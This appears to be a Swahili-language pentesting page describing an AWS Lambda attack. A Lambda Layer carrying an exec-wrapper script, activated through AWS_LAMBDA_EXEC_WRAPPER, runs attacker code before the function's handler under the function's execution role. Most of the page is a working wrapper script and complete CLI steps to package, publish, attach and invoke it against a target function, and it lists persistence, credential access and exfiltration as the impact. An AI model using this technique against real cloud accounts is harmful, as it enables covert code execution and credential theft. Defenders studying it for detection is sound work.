AWS - Lambda Exec Wrapper Layer Hijack (Pre-Handler RCE)

Reading time: 4 minutes

Muhtasari

Tumia vibaya environment variable AWS_LAMBDA_EXEC_WRAPPER ili kutekeleza script ya wrapper inayodhibitiwa na mshambuliaji kabla runtime/handler inaanza. Toa wrapper kupitia Lambda Layer kwenye /opt/bin/htwrap, weka AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap, kisha uitishe function. Wrapper inaendesha ndani ya mchakato wa runtime wa function, inarithi role ya utekelezaji ya function, na hatimaye hufanya exec ya runtime halisi ili handler ya asili bado ifanye kazi kawaida.

Idhini Zinazohitajika (mshambuliaji)

• lambda:UpdateFunctionConfiguration
• lambda:GetFunctionConfiguration
• lambda:InvokeFunction (or trigger via existing event)
• lambda:ListFunctions, lambda:ListLayers
• lambda:PublishLayerVersion (same account) and optionally lambda:AddLayerVersionPermission if using a cross-account/public layer

Wrapper Script

Weka wrapper kwenye /opt/bin/htwrap ndani ya layer. Inaweza kuendesha mantiki ya kabla ya handler na lazima itamalize na exec "$@" ili kuunganisha na runtime halisi.

#!/bin/bash
set -euo pipefail
# Pre-handler actions (runs in runtime process context)
echo "[ht] exec-wrapper pre-exec: uid=$(id -u) gid=$(id -g) fn=$AWS_LAMBDA_FUNCTION_NAME region=$AWS_REGION"
python3 - <<'PY'
import boto3, json, os
try:
ident = boto3.client('sts').get_caller_identity()
print('[ht] sts identity:', json.dumps(ident))
except Exception as e:
print('[ht] sts error:', e)
PY
# Chain to the real runtime
exec "$@"

Hatua za Shambulio (CLI)

# Vars
REGION=us-east-1
TARGET_FN=<target-lambda-name>

# 1) Package wrapper at /opt/bin/htwrap
mkdir -p layer/bin
cat > layer/bin/htwrap <<'WRAP'
#!/bin/bash
set -euo pipefail
echo "[ht] exec-wrapper pre-exec: uid=$(id -u) gid=$(id -g) fn=$AWS_LAMBDA_FUNCTION_NAME region=$AWS_REGION"
python3 - <<'PY'
import boto3, json
print('[ht] sts identity:', __import__('json').dumps(__import__('boto3').client('sts').get_caller_identity()))
PY
exec "$@"
WRAP
chmod +x layer/bin/htwrap
(zip -qr htwrap-layer.zip layer)

# 2) Publish the layer
LAYER_ARN=$(aws lambda publish-layer-version \
--layer-name ht-exec-wrapper \
--zip-file fileb://htwrap-layer.zip \
--compatible-runtimes python3.11 python3.10 python3.9 nodejs20.x nodejs18.x java21 java17 dotnet8 \
--query LayerVersionArn --output text --region "$REGION")

echo "$LAYER_ARN"

# 3) Attach the layer and set AWS_LAMBDA_EXEC_WRAPPER
aws lambda update-function-configuration \
--function-name "$TARGET_FN" \
--layers "$LAYER_ARN" \
--environment "Variables={AWS_LAMBDA_EXEC_WRAPPER=/opt/bin/htwrap}" \
--region "$REGION"

# Wait for update to finish
until [ "$(aws lambda get-function-configuration --function-name "$TARGET_FN" --query LastUpdateStatus --output text --region "$REGION")" = "Successful" ]; do sleep 2; done

# 4) Invoke and verify via CloudWatch Logs
aws lambda invoke --function-name "$TARGET_FN" /tmp/out.json --region "$REGION" >/dev/null
aws logs filter-log-events --log-group-name "/aws/lambda/$TARGET_FN" --limit 50 --region "$REGION" --query 'events[].message' --output text

Impact

• Utekelezaji wa msimbo kabla ya handler katika muktadha wa Lambda runtime kwa kutumia execution role ya function iliyopo.
• Hakuna mabadiliko yanayohitajika kwa code ya function au role; inafanya kazi katika managed runtimes za kawaida (Python, Node.js, Java, .NET).
• Inaruhusu persistence, credential access (mfano, STS), data exfiltration, na runtime tampering kabla handler inapoanza.